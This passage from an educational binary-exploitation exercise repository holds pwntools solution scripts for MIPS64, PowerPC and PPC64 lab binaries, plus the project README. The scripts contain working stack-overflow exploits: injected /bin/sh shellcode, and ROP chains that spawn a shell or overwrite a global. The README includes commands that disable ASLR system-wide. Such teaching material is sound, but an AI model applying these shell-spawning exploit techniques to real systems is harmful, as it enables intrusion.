/usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/05-shellcode-dynamic 39 | ... 40 | 9557 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 41 | ... 
42 | 9557 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 43 | """ 44 | 45 | """ 46 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 47 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 48 | 0x0000000000168aa8: move $t9, $s2; jalr $t9; daddiu $s0, $sp, 0x18; 49 | 0x0000000000082824: move $t9, $s0; jalr $t9; nop; 50 | """ 51 | 52 | import struct 53 | import sys 54 | 55 | from pwn import * 56 | 57 | context(arch='mips64', os='linux', endian='big', word_size=64) 58 | 59 | binary_path = './bin/mips64/05-shellcode-dynamic' 60 | 61 | ra_saved_addr = 0x40007ffe08 62 | buffer_addr = 0x40007ffd70 63 | libc_addr = 0x000000400085e000 64 | 65 | ld_s0_s2_addr = libc_addr + 0x00000000000e941c 66 | daddui_s0_sp_0x18_jump_s2_addr = libc_addr + 0x0000000000168aa8 67 | jump_s0_addr = libc_addr + 0x0000000000082824 68 | 69 | # Adapted from https://www.exploit-db.com/exploits/45287 70 | shellcode = \ 71 | "\x62\x2f\x0c\x3c"[::-1] + \ 72 | "\x6e\x69\x8c\x35"[::-1] + \ 73 | "\xf4\xff\xac\xaf"[::-1] + \ 74 | "\x73\x2f\x0d\x3c"[::-1] + \ 75 | "\x00\x68\xad\x35"[::-1] + \ 76 | "\xf8\xff\xad\xaf"[::-1] + \ 77 | "\xf4\xff\xa4\x67"[::-1] + \ 78 | "\xff\xff\x05\x28"[::-1] + \ 79 | "\xff\xff\x06\x28"[::-1] + \ 80 | "\xc1\x13\x02\x24"[::-1] + \ 81 | "\x0c\x01\x01\x01"[::-1] 82 | 83 | p = process(binary_path) 84 | #p = gdb.debug([binary_path]) 85 | 86 | payload = '' 87 | payload += 'a' * (ra_saved_addr - buffer_addr) 88 | payload += p64(ld_s0_s2_addr) 89 | payload += 'b' * 8 90 | payload += p64(0) # s0 91 | payload += p64(0) # s1 92 | payload += p64(jump_s0_addr) # s2 93 | payload += 'c' * 8 94 | payload += p64(daddui_s0_sp_0x18_jump_s2_addr) # ra 95 | payload += 'd' * 0x18 96 | payload += shellcode 97 | 98 | p.readuntil('> ') 99 | p.write(payload) 100 | p.interactive() 101 | -------------------------------------------------------------------------------- 
/pwn/ppc/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000054c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x100005a0 <+84>: lwz r0,4(r11) 9 | 0x100005a4 <+88>: mtlr r0 10 | 0x100005a8 <+92>: lwz r31,-4(r11) 11 | 0x100005ac <+96>: mr r1,r11 12 | 0x100005b0 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000560: file src/08-overwrite-global.c, line 9. 16 | (gdb) b *0x100005a0 17 | Breakpoint 2 at 0x100005a0: file src/08-overwrite-global.c, line 14. 18 | (gdb) b *0x100005b0 19 | Breakpoint 3 at 0x100005b0: file src/08-overwrite-global.c, line 14. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 24 | 9 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0xffffdd58 "\377\377" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x100005a0 in vulnerable () at src/08-overwrite-global.c:14 31 | 14 } 32 | (gdb) p/x $r11+4 33 | $2 = 0xffffdde4 34 | (gdb) c 35 | Continuing. 36 | 37 | Breakpoint 3, 0x100005b0 in vulnerable () at src/08-overwrite-global.c:14 38 | 14 } 39 | (gdb) i r $r1 40 | r1 0xffffdde0 4294958560 41 | """ 42 | 43 | """ 44 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/08-overwrite-global 45 | ... 46 | 19357 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 47 | ... 48 | 19357 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 49 | ... 
50 | """ 51 | 52 | """ 53 | $ ropper --nocolor --inst-count 9 --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 54 | 0x00146050: lwz r0, 0x44(r1); lwz r25, 0x24(r1); lwz r30, 0x38(r1); addi r1, r1, 0x40; mtlr r0; blr; 55 | 0x0013f2bc: lwz r0, 0x34(r1); lwz r27, 0x1c(r1); lwz r30, 0x28(r1); addi r1, r1, 0x30; mtlr r0; blr; 56 | 0x0008a5ec: lwz r29, 0x14(r1); lwz r0, 0x24(r1); lwz r30, 0x18(r1); addi r1, r1, 0x20; mtlr r0; blr; 57 | 0x000b6ce4: stw r29, 0(r27); mtctr r25; bctr; 58 | """ 59 | 60 | import struct 61 | import sys 62 | 63 | from pwn import * 64 | 65 | context(arch='powerpc', os='linux', endian='big', word_size=32) 66 | 67 | binary_path = './bin/ppc/08-overwrite-global' 68 | 69 | saved_pc_addr = 0xffffdde4 70 | buffer_addr = 0xffffdd58 71 | libc_addr = 0x0fe2c000 72 | 73 | lwz_r25_addr = libc_addr + 0x00146050 74 | lwz_r27_addr = libc_addr + 0x0013f2bc 75 | lwz_r29_addr = libc_addr + 0x0008a5ec 76 | stw_r29_r27_mtctr_r25_addr = libc_addr + 0x000b6ce4 77 | 78 | binary = ELF(binary_path) 79 | not_called_addr = binary.symbols['not_called'] 80 | x_addr = binary.symbols['x'] 81 | 82 | p = process(binary_path) 83 | #p = gdb.debug([binary_path]) 84 | 85 | payload = '' 86 | payload += 'a' * (saved_pc_addr - buffer_addr) 87 | payload += p32(lwz_r25_addr) 88 | # <- $r1 + 8 89 | payload += 'b' * (0x24 - 8) 90 | payload += p32(not_called_addr) # r25 91 | payload += 'c' * (0x44 - 0x24 - 4) 92 | payload += p32(lwz_r27_addr) # r0 93 | # <- $r1 + 8 94 | payload += 'e' * (0x1c - 8) 95 | payload += p32(x_addr) # r27 96 | payload += 'f' * (0x34 - 0x1c - 4) 97 | payload += p32(lwz_r29_addr) # r0 98 | # <- $r1 + 8 99 | payload += 'f' * (0x14 - 8) 100 | payload += p32(0xbeefc0de) # r29 101 | payload += 'h' * (0x24 - 0x14 - 4) 102 | payload += p32(stw_r29_r27_mtctr_r25_addr) # r0 103 | 104 | p.readuntil('> ') 105 | p.write(payload) 106 | p.interactive() 107 | -------------------------------------------------------------------------------- /pwn/ppc64/06-system-rop.py: 
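--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
0x0000000010000734 <+0>: mflr r0
0x0000000010000738 <+4>: std r0,16(r1)
...
0x0000000010000794 <+96>: ld r0,16(r1)
0x0000000010000798 <+100>: mtlr r0
0x000000001000079c <+104>: ld r31,-8(r1)
0x00000000100007a0 <+108>: blr
0x00000000100007a4 <+112>: .long 0x0
0x00000000100007a8 <+116>: .long 0x1
0x00000000100007ac <+120>: lwz r0,1(r1)
End of assembler dump.
(gdb) b vulnerable
Breakpoint 1 at 0x10000748: file src/06-system-rop.c, line 6.
(gdb) b *0x0000000010000794
Breakpoint 2 at 0x10000794: file src/06-system-rop.c, line 11.
(gdb) b *0x00000000100007a0
Breakpoint 3 at 0x100007a0: file src/06-system-rop.c, line 11.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/06-system-rop.c:6
6 printf("> ");
(gdb) p &buffer[0]
$1 = 0x40007ff940 ""
(gdb) c
Continuing.

Breakpoint 2, 0x0000000010000794 in vulnerable () at src/06-system-rop.c:11
11 }
(gdb) p/x $r1+16
$2 = 0x40007ff9e0
(gdb) c
Continuing.

Breakpoint 3, 0x00000000100007a0 in vulnerable () at src/06-system-rop.c:11
11 }
(gdb) i r $r1
r1 0x40007ff9d0 274886293968
(gdb) maintenance print msymbols
...
[2445] D 0x4000aa5e70 system section .opd
...
(gdb) x/3gx 0x4000aa5e70
0x4000aa5e70 : 0x00000040008f7ba0 0x0000004000abc300
0x4000aa5e80 : 0x0000000000000000
"""

"""
$ qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -strace ./bin/ppc64/06-system-rop
...
29507 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3
...
29507 mmap(NULL,2381768,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000875000
...
"""

"""
$ ropper --nocolor --arch PPC64 --file /usr/powerpc64-linux-gnu/lib/libc-2.27.so
0x00185b54: ld r2, 0x28(r1); ld r0, 0x80(r1); addi r1, r1, 0x70; mtlr r0; blr;
0x000ae6a0: ld r0, 0x80(r1); ld r3, 0xa8(r1); mtlr r0; addi r1, r1, 0x70; blr;
"""

# 06-system-rop on 64-bit big-endian PowerPC: overflow `buffer` and build a
# libc ROP chain that ends in system("/bin/sh"). Every address below is
# hardcoded from the gdb/strace sessions above and is only valid with ASLR
# disabled (see README) and this exact build.
import struct
import sys

from pwn import *

context(arch='powerpc64', os='linux', endian='big', word_size=64)

binary_path = './bin/ppc64/06-system-rop'
libc_path = '/usr/powerpc64-linux-gnu/lib/libc-2.27.so'

saved_pc_addr = 0x40007ff9e0    # $r1+16 in the epilogue: the slot the saved LR is reloaded from
buffer_addr = 0x40007ff940      # &buffer[0]
libc_addr = 0x0000004000875000  # where file offset 0 of libc.so.6 was mmap()'d (strace above)

# The `system` symbol names a function descriptor in .opd, not code: word 0 is
# the entry point and word 1 the TOC pointer the callee expects in r2 (see the
# `x/3gx` above). Returning straight into the entry point bypasses the
# descriptor, so the chain has to put the TOC pointer into r2 itself.
system_addr = 0x00000040008f7ba0
r2_value = 0x0000004000abc300

ld_r0_r2_blr_addr = libc_addr + 0x00185b54  # ld r2,0x28(r1); ld r0,0x80(r1); addi r1,r1,0x70; mtlr r0; blr
ld_r0_r3_blr_addr = libc_addr + 0x000ae6a0  # ld r0,0x80(r1); ld r3,0xa8(r1); mtlr r0; addi r1,r1,0x70; blr

libc = ELF(libc_path)
# ELF.search yields a virtual address; libc_addr is used as its load bias.
bin_sh_addr = libc_addr + next(libc.search(b'/bin/sh\x00'))

p = process(binary_path)
#p = gdb.debug([binary_path])

# After vulnerable's blr, $r1 == 0x40007ff9d0 and the saved LR sat at $r1+16,
# so the first byte after it lands at $r1+24. Both gadgets read r0 from
# 0x80(r1) and then add 0x70, i.e. r0 sits 0x10 above the new $r1, so the next
# stage again starts at $r1+24 -- that is what the "<- $r1 + 24" markers mean.
#
# Byte literals keep the script working under both pwntools 3.x (Python 2,
# where b'' is str) and 4.x (Python 3).
payload = b''
payload += b'a' * (saved_pc_addr - buffer_addr)
payload += p64(ld_r0_r2_blr_addr)
# <- $r1 + 24
payload += b'b' * (0x28 - 24)
payload += p64(r2_value)  # r2: TOC pointer for system
payload += b'c' * (0x80 - 0x28 - 8)
payload += p64(ld_r0_r3_blr_addr)  # r0
# <- $r1 + 24
payload += b'd' * (0x80 - 24)
payload += p64(system_addr)  # r0: entry point of system
payload += b'e' * (0xa8 - 0x80 - 8)
payload += p64(bin_sh_addr)  # r3: "/bin/sh"

# NOTE(review): the whole chain has to fit in the read() in
# src/06-system-rop.c; check that size there before changing offsets.
p.readuntil(b'> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/ppc64/08-overwrite-global.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
0x0000000010000794 <+0>: mflr r0
...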
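0x00000000100007f4 <+96>: ld r0,16(r1)
0x00000000100007f8 <+100>: mtlr r0
0x00000000100007fc <+104>: ld r31,-8(r1)
0x0000000010000800 <+108>: blr
0x0000000010000804 <+112>: .long 0x0
0x0000000010000808 <+116>: .long 0x1
0x000000001000080c <+120>: lwz r0,1(r1)
End of assembler dump.
(gdb) b vulnerable
Breakpoint 1 at 0x100007a8: file src/08-overwrite-global.c, line 9.
(gdb) b *0x00000000100007f4
Breakpoint 2 at 0x100007f4: file src/08-overwrite-global.c, line 14.
(gdb) b *0x0000000010000800
Breakpoint 3 at 0x10000800: file src/08-overwrite-global.c, line 14.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9
9 printf("> ");
(gdb) p &buffer[0]
$1 = 0x40007ff930 ""
(gdb) c
Continuing.

Breakpoint 2, 0x00000000100007f4 in vulnerable () at src/08-overwrite-global.c:14
14 }
(gdb) p/x $r1+16
$2 = 0x40007ff9d0
(gdb) c
Continuing.

Breakpoint 3, 0x0000000010000800 in vulnerable () at src/08-overwrite-global.c:14
14 }
(gdb) i r $r1
r1 0x40007ff9c0 274886293952
(gdb) p not_called
$3 = {void ()} 0x10000810
(gdb) p &x
$4 = (unsigned long *) 0x100200c8
"""

"""
$ qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -strace ./bin/ppc64/08-overwrite-global
...
19379 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3
...
19379 mmap(NULL,2381768,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000875000
...
"""

"""
$ ropper --nocolor --arch PPC64 --inst-count 9 --file /usr/powerpc64-linux-gnu/lib/libc-2.27.so
0x000eb7b8: ld r31, 0x78(r1); addi r1, r1, 0x80; ld r0, 0x10(r1); mtlr r0; blr;
0x000ae6a0: ld r0, 0x80(r1); ld r3, 0xa8(r1); mtlr r0; addi r1, r1, 0x70; blr;
0x001d86dc: addi r1, r1, 0x80; ld r0, 0x10(r1); std r3, 0(r31); ld r31, -8(r1); mtlr r0; blr;
"""

# 08-overwrite-global on 64-bit big-endian PowerPC: overflow `buffer`, then use
# a libc ROP chain to store a value into the global `x` and return into
# not_called(). Every address below is hardcoded from the gdb/strace sessions
# above and is only valid with ASLR disabled (see README) and this exact build.
import struct
import sys

from pwn import *

context(arch='powerpc64', os='linux', endian='big', word_size=64)

binary_path = './bin/ppc64/08-overwrite-global'

saved_pc_addr = 0x40007ff9d0    # $r1+16 in the epilogue: the slot the saved LR is reloaded from
buffer_addr = 0x40007ff930      # &buffer[0]
libc_addr = 0x0000004000875000  # where file offset 0 of libc.so.6 was mmap()'d (strace above)
not_called_addr = 0x10000810    # what gdb printed for `p not_called`
x_addr = 0x100200c8             # &x

ld_r31_addr = libc_addr + 0x000eb7b8      # ld r31,0x78(r1); addi r1,r1,0x80; ld r0,0x10(r1); mtlr r0; blr
ld_r3_addr = libc_addr + 0x000ae6a0       # ld r0,0x80(r1); ld r3,0xa8(r1); mtlr r0; addi r1,r1,0x70; blr
std_r3_r31_addr = libc_addr + 0x001d86dc  # addi r1,r1,0x80; ld r0,0x10(r1); std r3,0(r31); ld r31,-8(r1); mtlr r0; blr

p = process(binary_path)
#p = gdb.debug([binary_path])

# Plan: r31 = &x (gadget 1), r3 = value (gadget 2), "std r3,0(r31)" (gadget 3),
# then gadget 3's own mtlr/blr returns into not_called.
#
# After vulnerable's blr, $r1 == 0x40007ff9c0 and the saved LR sat at $r1+16,
# so the first byte after it lands at $r1+24 (the "<- $r1 + 24" markers).
# The chain never touches r2; presumably vulnerable() and not_called() share
# the binary's TOC so the value left in r2 is still right -- TODO confirm.
#
# Byte literals keep the script working under both pwntools 3.x (Python 2,
# where b'' is str) and 4.x (Python 3).
payload = b''
payload += b'a' * (saved_pc_addr - buffer_addr)
payload += p64(ld_r31_addr)

# <- $r1 + 24
payload += b'b' * (0x78 - 24)
payload += p64(x_addr)  # r31
# gadget 1 adds 0x80 *before* reading r0 from 0x10(r1): 0x90 from the old $r1
payload += b'c' * (0x90 - 0x78 - 8)
payload += p64(ld_r3_addr)  # r0

# <- $r1 + 24 (gadget 1 left r0 0x10 above its new $r1)
payload += b'e' * (0x80 - 24)
payload += p64(std_r3_r31_addr)  # r0
payload += b'c' * (0xa8 - 0x80 - 8)
payload += p64(0xdeadbabebeefc0de)  # r3
# gadget 2 leaves $r1 at old+0x70; gadget 3 adds 0x80 and reads r0 from
# 0x10(r1), i.e. old+0x100. Pad from the end of the r3 slot (old+0xb0) to there.
payload += b'e' * (0x70 + 0x80 - 0xa8 + 8)

# <- $r1 + 0x10 once gadget 3 has done its addi
payload += p64(not_called_addr)  # r0

# NOTE(review): the whole chain has to fit in the read() in
# src/08-overwrite-global.c; check that size there before changing offsets.
p.readuntil(b'> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/ppc64/07-execve-rop.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
0x0000000010000734 <+0>: mflr r0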
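0x0000000010000738 <+4>: std r0,16(r1)
...
0x0000000010000794 <+96>: ld r0,16(r1)
0x0000000010000798 <+100>: mtlr r0
0x000000001000079c <+104>: ld r31,-8(r1)
0x00000000100007a0 <+108>: blr
0x00000000100007a4 <+112>: .long 0x0
0x00000000100007a8 <+116>: .long 0x1
0x00000000100007ac <+120>: lwz r0,1(r1)
End of assembler dump.
(gdb) b vulnerable
Breakpoint 1 at 0x10000748: file src/07-execve-rop.c, line 6.
(gdb) b *0x0000000010000794
Breakpoint 2 at 0x10000794: file src/07-execve-rop.c, line 11.
(gdb) b *0x00000000100007a0
Breakpoint 3 at 0x100007a0: file src/07-execve-rop.c, line 11.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/07-execve-rop.c:6
6 printf("> ");
(gdb) p &buffer[0]
$1 = 0x40007ff980 ""
(gdb) c
Continuing.

Breakpoint 2, 0x0000000010000794 in vulnerable () at src/07-execve-rop.c:11
11 }
(gdb) p/x $r1+16
$2 = 0x40007ffa20
(gdb) c
Continuing.

Breakpoint 3, 0x00000000100007a0 in vulnerable () at src/07-execve-rop.c:11
11 }
(gdb) i r $r1
r1 0x40007ffa10 274886294032
(gdb) maintenance print msymbols
...
[2445] D 0x4000aa5e70 system section .opd
...
(gdb) x/3gx 0x4000aa5e70
0x4000aa5e70 : 0x00000040008f7ba0 0x0000004000abc300
0x4000aa5e80 : 0x0000000000000000
"""

"""
$ qemu-ppc64 -L /usr/powerpc64-linux-gnu/ -strace ./bin/ppc64/07-execve-rop
...
19379 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3
...
19379 mmap(NULL,2381768,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000875000
...
"""

"""
$ ropper --nocolor --arch PPC64 --inst-count 9 --file /usr/powerpc64-linux-gnu/lib/libc-2.27.so
0x001dd380: ld r0, 0x90(r1); li r5, 0; mtlr r0; addi r1, r1, 0x80; mr r3, r5; ld r31, -8(r1); blr;
0x0017e2e8: ld r0, 0xa0(r1); ld r4, 0x78(r1); mtlr r0; addi r1, r1, 0x90; ld r3, 8(r31); std r4, 8(r31); ld r31, -8(r1); blr;
0x000ae6a0: ld r0, 0x80(r1); ld r3, 0xa8(r1); mtlr r0; addi r1, r1, 0x70; blr;
0x00122230: li r0, 0xb; sc;
"""

# 07-execve-rop on 64-bit big-endian PowerPC: overflow `buffer` and build a
# libc ROP chain that issues execve("/bin/sh", NULL, NULL) directly via `sc`.
# Every address below is hardcoded from the gdb/strace sessions above and is
# only valid with ASLR disabled (see README) and this exact build.
import struct
import sys

from pwn import *

context(arch='powerpc64', os='linux', endian='big', word_size=64)

binary_path = './bin/ppc64/07-execve-rop'
libc_path = '/usr/powerpc64-linux-gnu/lib/libc-2.27.so'

saved_pc_addr = 0x40007ffa20    # $r1+16 in the epilogue: the slot the saved LR is reloaded from
buffer_addr = 0x40007ff980      # &buffer[0]
libc_addr = 0x0000004000875000  # where file offset 0 of libc.so.6 was mmap()'d (strace above)

li_r5_0_ld_r31_addr = libc_addr + 0x001dd380  # ld r0,0x90(r1); li r5,0; mtlr r0; addi r1,r1,0x80; mr r3,r5; ld r31,-8(r1); blr
ld_r4_addr = libc_addr + 0x0017e2e8           # ld r0,0xa0(r1); ld r4,0x78(r1); mtlr r0; addi r1,r1,0x90; ld r3,8(r31); std r4,8(r31); ld r31,-8(r1); blr
ld_r3_addr = libc_addr + 0x000ae6a0           # ld r0,0x80(r1); ld r3,0xa8(r1); mtlr r0; addi r1,r1,0x70; blr
li_r0_0xb_sc_addr = libc_addr + 0x00122230    # li r0,0xb; sc  (11 is execve on powerpc)

libc = ELF(libc_path)
# ELF.search yields a virtual address; libc_addr is used as its load bias.
bin_sh_addr = libc_addr + next(libc.search(b'/bin/sh\x00'))

binary = ELF(binary_path)
# Gadget 2 does "ld r3,8(r31); std r4,8(r31)", so r31 has to point at mapped,
# writable memory: the binary's .data. That store clobbers .data+8 with r4
# (0); presumably nothing the program still needs lives there -- verify if the
# target misbehaves after the chain runs.
binary_data_addr = binary.get_section_by_name('.data').header.sh_addr

p = process(binary_path)
#p = gdb.debug([binary_path])

# execve("/bin/sh", NULL, NULL): r5 = 0 (gadget 1), r4 = 0 (gadget 2),
# r3 = "/bin/sh" (gadget 3, which also replaces the junk r3 gadget 2 loaded),
# then r0 = 11 and `sc`.
#
# After vulnerable's blr, $r1 == 0x40007ffa10 and the saved LR sat at $r1+16,
# so the first byte after it lands at $r1+24. Each gadget reads r0 from 0x10
# above its new $r1 (0x90-0x80, 0xa0-0x90, 0x80-0x70), so every following stage
# again starts at $r1+24 -- that is what the "<- $r1 + 24" markers mean.
#
# Byte literals keep the script working under both pwntools 3.x (Python 2,
# where b'' is str) and 4.x (Python 3).
payload = b''
payload += b'a' * (saved_pc_addr - buffer_addr)
payload += p64(li_r5_0_ld_r31_addr)
# <- $r1 + 24
# gadget 1 reads r31 from -8(r1) *after* adding 0x80: 0x78 from the old $r1
payload += b'b' * (0x80 - 8 - 24)
payload += p64(binary_data_addr)  # r31
payload += b'c' * (0x90 - (0x80 - 8) - 8)
payload += p64(ld_r4_addr)  # r0
# <- $r1 + 24
payload += b'd' * (0x78 - 24)
payload += p64(0)  # r4
payload += b'e' * (0xa0 - 0x78 - 8)
payload += p64(ld_r3_addr)  # r0
# <- $r1 + 24
payload += b'f' * (0x80 - 24)
payload += p64(li_r0_0xb_sc_addr)  # r0
payload += b'g' * (0xa8 - 0x80 - 8)
payload += p64(bin_sh_addr)  # r3

# NOTE(review): the whole chain has to fit in the read() in
# src/07-execve-rop.c; check that size there before changing offsets.
p.readuntil(b'> ')
p.write(payload)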
119 | p.interactive() 120 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Easy Linux PWN 2 | ============== 3 | 4 | This is a set of Linux binary exploitation tasks for beginners. Right now they only cover stack buffer overflows. 5 | 6 | I've created these tasks to learn how to do simple binary exploitation on different architectures. 7 | For educational purposes, while solving the tasks you have to follow the set of rules listed below. 8 | The tasks are made deliberately small and some of the rules are deliberately unrealistic. 9 | Contrary to most CTF challenges, in these tasks the solution is given to you; you just have to implement it. 10 | 11 | 12 | ## Rules 13 | 14 | 1. All tasks must be solved using the suggested approach even if there are other easier ways. 15 | 16 | 2. All tasks must be solved with specific protections assumed to be enabled or disabled (even if the architecture, the toolchain or the environment doesn't support it). 17 | 18 | 3. All tasks assume a dynamically linked libc with a known binary. 19 | 20 | 4. All ROP chains must be built manually. 21 | 22 | 23 | ## Tasks 24 | 25 | ### Suggested approaches 26 | 27 | 1. [01-local-overflow](src/01-local-overflow.c): 28 | overflow `buffer` and overwrite `x` with the desired value. 29 | 30 | 2. [02-overwrite-ret](src/02-overwrite-ret.c): 31 | overwrite any of the return addresses on the stack with the address of `not_called()`. 32 | 33 | 3. [03-one-gadget](src/03-one-gadget.c): 34 | jump to a [one\_gadget](https://github.com/david942j/one_gadget) address. 35 | Make sure to satisfy the required constraints if there are any. 36 | For some of the architectures this might require using a ROP chain, which technically makes "one\_gadget" no longer "one". 37 | 38 | 4.
[04-shellcode-static](src/04-shellcode-static.c): 39 | allocate a shellcode on the stack that launches `/bin/sh` and jump to it. 40 | Assume that the shellcode address on the stack is known. 41 | No need to deal with [cache coherency](https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm) on ARM, MIPS and PowerPC. 42 | 43 | 5. [05-shellcode-dynamic](src/05-shellcode-dynamic.c): 44 | same as the previous task, but here the stack address (and therefore the shellcode address on the stack) is unknown. 45 | 46 | 6. [06-system-rop](src/06-system-rop.c): 47 | compose a ROP chain to execute `system("/bin/sh")`. 48 | 49 | 7. [07-execve-rop](src/07-execve-rop.c): 50 | compose a ROP chain to execute `execve("/bin/sh", NULL, NULL)` via a syscall. 51 | Explicitly specify the second and third arguments. 52 | 53 | 8. [08-overwrite-global](src/08-overwrite-global.c): 54 | compose a ROP chain to overwrite `x` with the desired value and then jump to `not_called()`. 55 | 56 | 57 | ### Protections 58 | 59 | Blank spaces mean the protection state is not relevant for the suggested approach. 60 | 61 | | Task | Binary\* | Stack\* | Libc\* | Canary | NX | RELRO | 62 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | 63 | | [01-local-overflow](src/01-local-overflow.c) | | | | No | | | 64 | | [02-overwrite-ret](src/02-overwrite-ret.c) | Known | | Known | No | | | 65 | | [03-one-gadget](src/03-one-gadget.c) | Known | | Known | No | | | 66 | | [04-shellcode-static](src/04-shellcode-static.c) | | Known | | No | No | | 67 | | [05-shellcode-dynamic](src/05-shellcode-dynamic.c) | Known | | Known | No | No | | 68 | | [06-system-rop](src/06-system-rop.c) | Known | | Known | No | | | 69 | | [07-execve-rop](src/07-execve-rop.c) | Known | | Known | No | | | 70 | | [08-overwrite-global](src/08-overwrite-global.c) | Known | | Known | No | | | 71 | 72 | __\*__ - refers to the address of the binary, stack or libc. 
This allows finer-grained control than a plain ASLR/PIE on/off switch. 73 | 74 | To disable ASLR: 75 | 76 | ``` bash 77 | echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 78 | ``` 79 | 80 | This setting is system-wide: every process started afterwards gets unrandomized mappings (it does not survive a reboot, but nothing else turns it back on), so only do this on a disposable lab machine or VM and set it back to `2` as soon as you are done. 81 | 82 | To enable ASLR again: 83 | 84 | ``` bash 85 | echo 2 | sudo tee /proc/sys/kernel/randomize_va_space 86 | ``` 87 | 88 | 89 | ## Solutions 90 | 91 | These solutions are provided only for reference and are not portable (they contain hardcoded addresses and offsets and were only tested in a single environment). 92 | 93 | | Task | x86 | x86-64 | arm | arm64 | mips | mips64 | ppc | ppc64 | sparc64 | 94 | | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | :---: | 95 | | [01-local-overflow](src/01-local-overflow.c) | [+](pwn/x86/01-local-overflow.py) | [+](pwn/x86-64/01-local-overflow.py) | [+](pwn/arm/01-local-overflow.py) | [+](pwn/arm64/01-local-overflow.py) | [+](pwn/mips/01-local-overflow.py) | [+](pwn/mips64/01-local-overflow.py) | [+](pwn/ppc/01-local-overflow.py) | [+](pwn/ppc64/01-local-overflow.py) | [+](pwn/sparc64/01-local-overflow.py) | 96 | | [02-overwrite-ret](src/02-overwrite-ret.c) | [+](pwn/x86/02-overwrite-ret.py) | [+](pwn/x86-64/02-overwrite-ret.py) | [+](pwn/arm/02-overwrite-ret.py) | [+](pwn/arm64/02-overwrite-ret.py) | [+](pwn/mips/02-overwrite-ret.py) | [+](pwn/mips64/02-overwrite-ret.py) | [+](pwn/ppc/02-overwrite-ret.py) | [+](pwn/ppc64/02-overwrite-ret.py) | [+](pwn/sparc64/02-overwrite-ret.py) | 97 | | [03-one-gadget](src/03-one-gadget.c) | [+](pwn/x86/03-one-gadget.py) | [+](pwn/x86-64/03-one-gadget.py) | | [+](pwn/arm64/03-one-gadget.py) | | | | | | 98 | | [04-shellcode-static](src/04-shellcode-static.c) | [+](pwn/x86/04-shellcode-static.py) | [+](pwn/x86-64/04-shellcode-static.py) | [+](pwn/arm/04-shellcode-static.py) | [+](pwn/arm64/04-shellcode-static.py) | [+](pwn/mips/04-shellcode-static.py) | [+](pwn/mips64/04-shellcode-static.py) | [+](pwn/ppc/04-shellcode-static.py) | [+](pwn/ppc64/04-shellcode-static.py) | | 99 | |
[05-shellcode-dynamic](src/05-shellcode-dynamic.c) | [+](pwn/x86/05-shellcode-dynamic.py) | [+](pwn/x86-64/05-shellcode-dynamic.py) | [+](pwn/arm/05-shellcode-dynamic.py) | [+](pwn/arm64/05-shellcode-dynamic.py) | [+](pwn/mips/05-shellcode-dynamic.py) | [+](pwn/mips64/05-shellcode-dynamic.py) | [+](pwn/ppc/05-shellcode-dynamic.py) | | | 98 | | [06-system-rop](src/06-system-rop.c) | [+](pwn/x86/06-system-rop.py) | [+](pwn/x86-64/06-system-rop.py) | [+](pwn/arm/06-system-rop.py) | [+](pwn/arm64/06-system-rop.py) | [+](pwn/mips/06-system-rop.py) | [+](pwn/mips64/06-system-rop.py) | [+](pwn/ppc/06-system-rop.py) | [+](pwn/ppc64/06-system-rop.py) | | 99 | | [07-execve-rop](src/07-execve-rop.c) | [+](pwn/x86/07-execve-rop.py) | [+](pwn/x86-64/07-execve-rop.py) | [+](pwn/arm/07-execve-rop.py) | [+](pwn/arm64/07-execve-rop.py) | [+](pwn/mips/07-execve-rop.py) | [+](pwn/mips64/07-execve-rop.py) | [+](pwn/ppc/07-execve-rop.py) | [+](pwn/ppc64/07-execve-rop.py) | | 100 | 